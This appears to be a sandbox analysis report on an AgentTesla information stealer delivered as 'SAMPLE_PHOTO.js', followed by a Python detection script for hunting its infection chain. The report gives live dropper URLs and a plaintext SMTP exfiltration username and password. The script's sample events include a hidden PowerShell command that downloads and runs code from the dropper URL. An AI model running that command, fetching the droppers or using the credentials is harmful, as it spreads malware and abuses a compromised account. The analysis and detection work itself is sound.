General

  • Target

    SAMPLE_PHOTO.js

  • Size

    134KB

  • Sample

    241115-mstg4ashje

  • MD5

    8bba05d98ae1ac9cc82906a4b0009927

  • SHA1

    7b999d1f99203e2aa259fa3576ccee0cc4edfb2a

  • SHA256

    791db72c082562ed4c4b8579dd83fddf3f30ef6af450f72757ded6d686fbd300

  • SHA512

    e643617e43323e19dccb9b94f2076f6b3f7be87e38ab3bae9e5f0698df1b24896f3fb8013eb1452ac143c65b06f884a588e3a9214431352bc49e6499b75df7bb

  • SSDEEP

    3072:VfZR0BBn6Dxw8V/QaKkfi60sRrdBn6Dxw8V/QaKkfiu:rmBn61wkYSP9RpBn61wkYSr

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs

    ps1.dropper

    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

    exe.dropper

    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.ctdi.com.ph
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    A#f+Y]H8iO4a

Extracted

  • Family
    agenttesla


Targets

    • Target

      SAMPLE_PHOTO.js

    • Size

      134KB

    • MD5

      8bba05d98ae1ac9cc82906a4b0009927

    • SHA1

      7b999d1f99203e2aa259fa3576ccee0cc4edfb2a

    • SHA256

      791db72c082562ed4c4b8579dd83fddf3f30ef6af450f72757ded6d686fbd300

    • SHA512

      e643617e43323e19dccb9b94f2076f6b3f7be87e38ab3bae9e5f0698df1b24896f3fb8013eb1452ac143c65b06f884a588e3a9214431352bc49e6499b75df7bb

    • SSDEEP

      3072:VfZR0BBn6Dxw8V/QaKkfi60sRrdBn6Dxw8V/QaKkfiu:rmBn61wkYSP9RpBn61wkYSr

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) and information stealer written in Visual Basic .NET.

    • Agenttesla family

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely for geofencing.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP address.

    • Suspicious use of SetThreadContext
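The behaviours above, together with the dropper URL and the SMTP exfiltration server from the Malware Config section, translate directly into a host-telemetry hunt: a script host launching hidden PowerShell, a process contacting 1017.filemail.com, a non-mail process opening an SMTP submission connection on port 587, and an external IP lookup. The following Python is an added example, not code from the sandbox or the report. The indicators (dropper host, SMTP host and port) come from the page; the Sysmon-style JSON event shape, the sample events, the reconstructed PowerShell command line, and the lists of script hosts, mail clients and IP-lookup services are assumptions made for the example.

```python
"""Hunt Sysmon-style ProcessCreate/NetworkConnect events (JSON lines) for the
chain this report describes: script host -> hidden PowerShell -> dropper URL,
then external IP lookup and SMTP submission to the exfil server.

Indicators come from the report; the event format and all sample events are
constructed for this example and were not captured from the sample."""
import json
import re
from urllib.parse import urlparse

# --- Indicators taken from the report (Malware Config / Credentials) ---
DROPPER_URL = ("https://1017.filemail.com/api/file/get"
               "?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w"
               "&pk_vid=fd4f614bb209c62c1730945176a0904f")
DROPPER_HOST = urlparse(DROPPER_URL).hostname          # 1017.filemail.com
EXFIL_SMTP_HOST = "mail.ctdi.com.ph"
EXFIL_SMTP_PORT = 587

# --- Assumptions for the example (not stated in the report) ---
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # what executes a .js attachment
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# "-w hidden", "-WindowStyle Hidden" and the numeric form "-w 1" all hide the window.
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}      # processes expected to speak SMTP
IP_LOOKUP_HOSTS = {"api.ipify.org", "checkip.dyndns.org", "icanhazip.com"}


def basename(path):
    """Sysmon records full image paths; compare on the lower-cased file name."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    findings = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    if parent in SCRIPT_HOSTS and image in POWERSHELL and HIDDEN_WINDOW_RE.search(cmd):
        findings.append(("hidden_powershell_from_script_host", ev["ProcessId"], f"{parent} -> {cmd}"))
    if DROPPER_HOST in cmd.lower():
        findings.append(("dropper_host_in_command_line", ev["ProcessId"], DROPPER_HOST))
    return findings


def check_network_connect(ev):
    findings = []
    image = basename(ev["Image"])
    host, port = ev.get("DestinationHostname", "").lower(), int(ev["DestinationPort"])
    if host == DROPPER_HOST:
        findings.append(("dropper_host_contacted", ev["ProcessId"], f"{image} -> {host}:{port}"))
    if port == EXFIL_SMTP_PORT and image not in MAIL_CLIENTS:
        tag = "known_exfil_server" if host == EXFIL_SMTP_HOST else "unknown_server"
        findings.append(("smtp_submission_from_non_mail_process", ev["ProcessId"],
                         f"{image} -> {host}:{port} ({tag})"))
    if host in IP_LOOKUP_HOSTS:
        findings.append(("external_ip_lookup", ev["ProcessId"], f"{image} -> {host}"))
    return findings


CHECKS = {"ProcessCreate": check_process_create, "NetworkConnect": check_network_connect}


def hunt(lines):
    """Run every check over JSON-lines events; return (rule, pid, detail) tuples."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        check = CHECKS.get(ev.get("EventType"))
        if check:
            findings.extend(check(ev))
    return findings


# Constructed sample telemetry. The PowerShell command line in the first event is
# an illustrative reconstruction; the report does not show the real one.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
PAYLOAD = r"C:\Users\victim\AppData\Roaming\payload.exe"
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventType": "ProcessCreate", "ProcessId": 4120, "Image": PS_IMAGE,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                    f".DownloadString('{DROPPER_URL}')\""},
    {"EventType": "NetworkConnect", "ProcessId": 4120, "Image": PS_IMAGE,
     "DestinationHostname": "1017.filemail.com", "DestinationPort": 443},
    {"EventType": "ProcessCreate", "ProcessId": 5004, "Image": OUTLOOK,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "OUTLOOK.EXE"},
    {"EventType": "NetworkConnect", "ProcessId": 5004, "Image": OUTLOOK,    # benign mail client
     "DestinationHostname": "smtp.office365.com", "DestinationPort": 587},
    {"EventType": "NetworkConnect", "ProcessId": 6212, "Image": PAYLOAD,
     "DestinationHostname": "api.ipify.org", "DestinationPort": 443},
    {"EventType": "NetworkConnect", "ProcessId": 6212, "Image": PAYLOAD,
     "DestinationHostname": "mail.ctdi.com.ph", "DestinationPort": 587},
]]

if __name__ == "__main__":
    for rule, pid, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Against the constructed events this yields five findings: the hidden PowerShell launch and its command line referencing the dropper host, the PowerShell network connection to 1017.filemail.com, the IP lookup, and the port 587 connection from the unsigned payload to mail.ctdi.com.ph; Outlook's own port 587 traffic is not flagged. In production the SMTP rule should key on the full allow-list of your mail clients rather than the two names assumed here.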

MITRE ATT&CK Enterprise v15

Tasks